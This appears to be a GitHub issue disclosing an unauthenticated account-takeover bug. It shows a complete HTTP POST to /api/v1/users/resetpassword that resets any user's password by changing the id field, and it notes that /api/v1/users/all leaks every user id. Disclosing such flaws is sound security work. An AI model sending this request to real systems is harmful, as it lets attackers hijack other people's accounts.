
Vulnerability: Account Takeover - Arbitrary Password Change (unauthenticated)

Open blockisec opened this issue 2 years ago • 0 comments

The password reset endpoint (/api/v1/users/resetpassword) allows any unauthenticated user to change passwords of any other user by just incrementing the id JSON parameter.

POST /api/v1/users/resetpassword HTTP/1.1
Host: localhost:5000
Content-Length: 35
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Content-Type: application/json
Accept: */*
Origin: http://localhost:5000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:5000/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"password":"changeme5678","id":1}

The request above will reset the password of the user with id=1 to changeme5678.

The API endpoint /api/v1/users/all gives a list of all users (with their id) to unauthenticated users.

blockisec · Jul 21 '22 04:07